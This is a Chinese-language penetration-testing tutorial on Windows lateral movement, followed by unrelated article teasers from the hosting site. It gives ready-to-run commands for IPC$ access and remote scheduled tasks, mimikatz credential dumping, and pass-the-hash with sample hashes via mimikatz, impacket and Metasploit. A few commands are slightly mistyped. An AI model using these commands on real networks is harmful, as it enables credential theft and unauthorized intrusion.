内网横向1

IPC$详解

IPC( Internet Process Connection) 共享 命名管道 的资源 , 是为了实现进程间通信而开放的命名管道。 IPC 可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用
通过 ipc$ ,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件 , 进行上传、下载 操作 还可以在日标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息
其默认使用端口为139、445

利用条件:

1.开启139、445端口.

2.管理员开启默认共享,可以用net share 查看

详细命令:

建立ipc连接:net use \\10.1.1.135\$ipc
删除ipc连接:net use \\10.1.1.135\$ipc /del
遍历c盘下windows目录:  dir \\10.1.1.135\c$\Windows   或者:dir \\10.1.1.135\admin$
复制本地文件到目标机器下users目录:  copy shell.bat \\10.1.1.135\c$\Users 
查看任务:tasklist /S \\10.1.1.135



windows2008及以下: 
添加一项ID为777的任务在4:13执行:
at \\10.1.1.132: 4:13 c:\artifact.exe added a new job with jobid=777   
查看计划任务列表:
at \\10.1.1.132
删除 id 为 777 的计划任务,不加 id 删除所有计划任务:
at \\10.1.1.132 777 /delete


windows2008以上:
添加一项ID为test的任务在4:13执行:
schtasks /create /s 10.1.1.135 /tn test /sc once /st 04:13 /ru system /tr
"cmd.exe /c ipconfig > c:\1.txt" /f /u
立即执行该任务:
schtasks /run /s 10.1.1.135 /i /tn test
删除该任务:
schtasks /s 10.1.1.135 /delete /tn test /f

没有命令回显:

计划运行后
type \\10.1.1.135\c$\1.txt

Windows认证

windows本地认证:

路径: %SystemRoot%\system32\config\sam   (c:\\windows\system32\config\sam)
当我们登录系统的时候 , 系统会自动地读取 SAM 文件中的 密码 与我们输入的 密码 进行比对,如果相 同,证明认证成功! 这个SAM 文件中保留了计算机本地所有用户的凭证信息,可以理解为是一个数据库。

NTLM Hash

NTLM HASH 是支持 Net NTLM 认证协议以及本地认证过程中的一个重要参与物,其长度为 32 位,
由数字和字母组成
Windows 本身不存储用户的明文密码,他会将用户的明文密码经过加密算法后存储在 SAM 数据库
当用户登录时,将用户输入的明文密码也加密成 NTLM HASH ,与 SAM 数据库中的 NTLM HASH
行对比, NTLM HASH 的前身是 LM HASH ,目前已经基本被淘汰(因为算法比较脆弱,但是目前老
版本操作系统还是存在,比如 XP Server 03 )。
这个 NTLM 是一种网络认证协议,与 NTLM Hash 的关系就是: NTLM 网络认证协议是以 NTLM Hash
作为根本凭证进行认证的协议。也就是说, NTLM NTLM Hash 相互对应。

LM Hash(已废弃)

NTLM 协议问世之前,它的前身就是 LM LAN Manager )协议。
LM NTLM 协议的认证机制相同,但是加密算法不同。
目前大多数的 Windows 都采用 NTLM 协议认证, LM 协议已经基本淘汰了,服务器版从 Wndows
Sever2003 以后, Windows 操作系统的认证方式均为 NTLM Hash

Windows网络认证

NTLM协议

NTLM 是一种网络认证协议,它是基于挑战( Chalenge / 响应( Response )认证机制的一种认证模 式。这个协议只支持Windows 早期 SMB 协议在网络上传输明文口令。后来出现 LAN Manager
Challenge/Response 验证机制,简称 LM ,它是如此简单以至很容易就被破解,现在又有了 NTLM 以及 Kerberos。

NTLM V2协议

NTLM v1 NTLM v2 最显著的区别就是 Challenge 与加密算法不同,共同点就是加密的原料都是 NTLM Hash。
不同之处 :
Challage:NTLM v1 Challenge 8 位, NTLM v2 Challenge 16 位。
Net-NTLM Hash:NTLM v1 的主要加密算法是 DES NTLM v2 的主要加密算法是 HMAC-MD5

Pass The Hash (哈希传递)

哈希传递是能够在不需要账户明文密码的情况下完成认证的一个技术。解决了我们渗透中获取不到明文密码、破解不了NTLM Hash而又 想扩大战果的问题

进行哈希传递的必要条件:

1.哈希传递需要被认证的主机能够访问到服务器

2.哈希传递需要被传递认证的用户名

3.哈希传递需要被传递认证用户的 NTLM Hash

常用工具

mimikatz(windows->windows)

cls-----------------------------清屏
exit----------------------------退出
version------------查看mimikatz的版本
system::user-----查看当前登录的系统用户
system::computer-------查看计算机名称
process::list------------------列出进程
process::suspend 进程名称 -----暂停进程
process::stop 进程名称---------结束进程
process::modules --列出系统的核心模块及所在位置
service::list---------------列出系统的服务
service::remove-----------移除系统的服务
service::start stop 服务名称--启动或停止服务
privilege::list---------------列出权限列表
privilege::enable--------激活一个或多个权限
privilege::debug-----------------提升权限
nogpo::cmd------------打开系统的cmd.exe
nogpo::regedit -----------打开系统的注册表
nogpo::taskmgr-------------打开任务管理器
ts::sessions-----------------显示当前的会话
ts::processes------显示进程和对应的pid情况等
sekurlsa::wdigest-----获取本地用户信息及密码
sekurlsa::tspkg------获取tspkg用户信息及密码
sekurlsa::logonPasswords--获登陆用户信息及密码
kerberos::purge # 清除票据
kerberos::list # 查看票据
kerberos::ptc # 导入票据
kerberos::clist # 导入.bin文件
lsadump::lsa /patch   #在DC上查询所有域用户的密码


mimikatz.exe privilege::debug sekurlsa::logonpasswords > 1.txt exit  -------一句话抓密码

常规流程:

mimikatz # a:: // 查看模块 以管理员或其他高权限启动 mimikatz
mimikatz # privilege::debug // 提升至 system 权限 显示 Privilege '20' OK 表示提权成功
mimikatz # sekurlsa:: // 查看指定模块下命令
mimikatz # sekurlsa::logonPasswords // 抓取密码及 hash
哈希传递:
hash 传递成功后 mimikatz 会帮你打开一个目标机 system 权限的 cmd 窗口
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:administrator /domain:WIN-1NUOMDF66RK
/ntlm:afffeba176210fad4628f0524bfe1942
安装 KB2871997 补丁主机 AES256 密钥哈希传递
mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys
mimikatz # sekurlsa::pth /user:administrator /domain:WIN-1NUOMDF66RK /aes256:抓到
的aes256值

impacket - smbexec.py(linux->windows)

smbexec.py
# 明文密码传递
smbexec.py administrator:123.com\@192.168.23.144
# NTLM hash 传递
smbexec.py administrator@192.168.23.144 -hashes
:afffeba176210fad4628f0524bfe1942
smbexec.py PEIXUN/Administrator@192.168.23.100 -hashes
:afffeba176210fad4628f0524bfe1942

msf-psexec

msfconsole
use /exploit/windows/smb/psexec
show options

可以看到已经默认设置完了,但是需要额外设置smbuser、smbpass、rhost

set rhost 10.1.1.128   #目标地址
set SMBUser Administrator  #目标地址username
set smbpass bc527e95ccf12e45f4e80923367f85d:2f60d4a58005210ac1580a9aaa7d7e95    #通过mimikatz抓取到的目标地址的LM和NTLM

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/474919.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

开启Github 2FA验证

1、什么玩意? 一觉睡醒看到邮箱来了一封邮件,让我做什么?(迷迷糊糊看不清,再睡一会~) 2、好吧,准备开搞 看了一下网上的解决方案,那些什么密码 app 我又没有也不想注册。 还有 SMS 短信的,但…

ssm项目(tomcat项目),定时任务(每天运行一次)相同时间多次重复运行job 的bug

目录标题 一、原因 一、原因 debug本地调试没有出现定时任务多次运行的bug,上传到服务器就出现多次运行的bug。(war的方式部署到tomcat) 一开始我以为是代码原因,或者是linux和win环境不同运行定时任务的方式不一样。 但是自己…

成都欣丰洪泰文化传媒有限公司怎么样?靠谱吗?

在数字经济的浪潮中,成都欣丰洪泰文化传媒有限公司凭借其深厚的行业经验和敏锐的市场洞察力,专注于电商服务领域,不断推陈出新,成为行业的佼佼者。今天,就让我们一同走进欣丰洪泰的世界,探索其如何引领电商…

自动报警灭火系统有哪三种类型?最新选择是这种!

用一句话概括自动报警灭火系统,就是能够在无需人工干预的基础上,自行灭火且发出告警的系统。听上去是不是很神奇?事实上,在科技的帮助下,只需要在监控场所预先安装好火灾探测器和报警控制器就可以实现这一切。接下来&a…

【在table里显示下拉框形式】

图&#xff1a; 一&#xff1a;主要是看审核方式&#xff0c;prop"status"和保存按钮的scope.row <el-table-column prop"status" label"审核方式" align"center"><template slot-scope"scope"><el-select v…

python基础20_递归_迭代器_生成器

今天讲的内容呢?就是真的了解了,了解即可 放松一下, 先来讲讲递归 那么什么是递归呢? 比如我举一个生活中的例子 你去电影院看电影,坐在某一行,对吧,但是你不知道自己是第几行 于是呢,就找前面的兄弟,前面那哥们呢也不知道是第几行,就再问前面的那哥们,前面的也不知道啊…

png图片如压缩体积?试试这个压缩小技巧

png作为我们常用的图片格式之一&#xff0c;这种格式的图片画面更加清晰&#xff0c;图片的体积也比较大。当我们需要对png图片进行压缩处理的时候应该怎么办呢&#xff1f;很简单&#xff0c;使用图片压缩器&#xff08;https://www.yasuotu.com/&#xff09;无需下载软件&…

NCV551SN33T1G线路稳压器中文资料PDF数据手册引脚图图片价格参数产品文档

产品概述&#xff1a; NCP551 系列固定输出低漏 (LDO) 线路稳压器适用于需要低静止电流的应用。NCP551 系列具有 4.0 uA 的超低静止电流。每个器件均包含电压参比单元、误差放大器、PMOS 功率晶体管、用于设置输出电压的电阻、电流限值和温度限值保护电路。NCP551 设计为使用低…

可观测性体系建设后,该如何挖掘数据及工具价值?

在现代企业的运维管理中&#xff0c;构建高效且可靠的可观测性体系是保障系统稳定性和业务连续性的关键。然而&#xff0c;运维团队成员的技术能力参差不齐往往成为实现这一目标的障碍。尤其在处理复杂系统故障时&#xff0c;高度依赖专业知识和经验的可观测性工具很难被全员有…

虚拟资源会员商城系统源码 付费商城系统源码 全开源可二开

在互联网时代&#xff0c;虚拟资源的交易和付费会员服务已经成为许多企业重要的盈利手段。为了满足不同商家对于虚拟资源销售和会员服务管理的需求&#xff0c;一款功能强大、灵活可配置的虚拟资源VIP会员商城系统源码与付费系统源码成为很多人的当务之求。分享一款全开源可二开…

Linux系统本地部署Docker Compose UI服务结合内网穿透实现公网访问

文章目录 1. 安装Docker2. 检查本地docker环境3. 安装cpolar内网穿透4. 使用固定二级子域名地址远程访问 Docker Compose UI是Docker Compose的web界面。这个项目的目标是在Docker Compose之上提供一个最小的HTTP API&#xff0c;同时保持与Docker Compose CLI的完全互操作性。…

css使用变量

vue3单文件SFC新特性在css里可以使用变量&#xff0c;具体使用如下&#xff1a; <template><div class"home-view"><span>测试</span><p>测试2</p></div> </template><script setup lang"ts"> imp…

基于SpringBoot的高校办公室行政事务管理系统

采用技术 基于SpringBoot的高校办公室行政事务管理系统的设计与实现~ 开发语言&#xff1a;Java 数据库&#xff1a;MySQL 技术&#xff1a;SpringBootMyBatis 工具&#xff1a;IDEA/Ecilpse、Navicat、Maven 页面展示效果 功能清单 教师信息管理 办公室管理 办公物资管…

Windows 11 鼠标右键可选择 cmd 命令行选项

** Windows 11 鼠标右键可选择 cmd 命令行选项 ** 在文件夹内打开命令行&#xff0c;只能使用 Windows 自带的 PowerShell &#xff0c; 作为一个 cmd 重度使用用户来说很是折磨&#xff0c;需要打开 cmd 然后切换盘符再 cd 。。。 现在咱们自己创建一个可以打开 cmd 的方法…

springboot网站开发如何配置log4j日志插件

springboot网站开发如何配置log4j日志插件&#xff01;为了便于服务器等环境下的错误情况的排查根源&#xff0c;还是很有必要使用日志插件的&#xff0c;它可以记录下我们提前埋下的锚点信息。 在遇到故障&#xff0c;查看这些锚点记录的日志信息&#xff0c;可以快速高效的解…

MySOL数据库管理

数据库基本操作 库和表 数据库–>数据表–>行&#xff08;记录&#xff09;&#xff1a;用来描述一个对象的信息列&#xff08;字段&#xff09;&#xff1a;用来描述对象的一个属性常用的数据类型 int整型float单精度浮点 4字节32位double双精度浮点 8字节64位char固…

如何在Linux Ubuntu系统安装Nginx服务并实现无公网IP远程连接

文章目录 1. 安装Docker2. 使用Docker拉取Nginx镜像3. 创建并启动Nginx容器4. 本地连接测试5. 公网远程访问本地Nginx5.1 内网穿透工具安装5.2 创建远程连接公网地址5.3 使用固定公网地址远程访问 在开发人员的工作中&#xff0c;公网远程访问内网是其必备的技术需求之一。对于…

爬虫实战-Python爬取百度当天热搜内容

爬虫实战-Python爬取百度当天热搜内容 学习建议学习目标预期内容目标分解热搜地址热搜标题热搜简介热搜指数小总结 代码实现总结 学习建议 本文仅用于学习使用&#xff0c;不做他用&#xff1b;本文仅获取页面的内容&#xff0c;作为学习和对Python知识的了解&#xff0c;不会…

蓝桥-K倍区间--前缀和

题目描述&#xff1a; 给定一个长度为 NN 的数列&#xff0c;A1,A2,…AN&#xff0c;如果其中一段连续的子序列 Ai,Ai1,…Aj 之和是 K 的倍数&#xff0c;我们就称这个区间 [i,j] 是 K 倍区间。 你能求出数列中总共有多少个 K 倍区间吗&#xff1f; 输入格式 第一行包含两个…

vue3 elementPlus 设置树形报错时 setCheckedKeys of undefined

第一种解决方法 nextTick(async ()>{ treeRef.value!.setCheckedKeys(rows.permissionIds, false) }) 第一种解决方法 onMounted(async () > { treeRef.value!.setCheckedKeys([3], false) }&#xff09;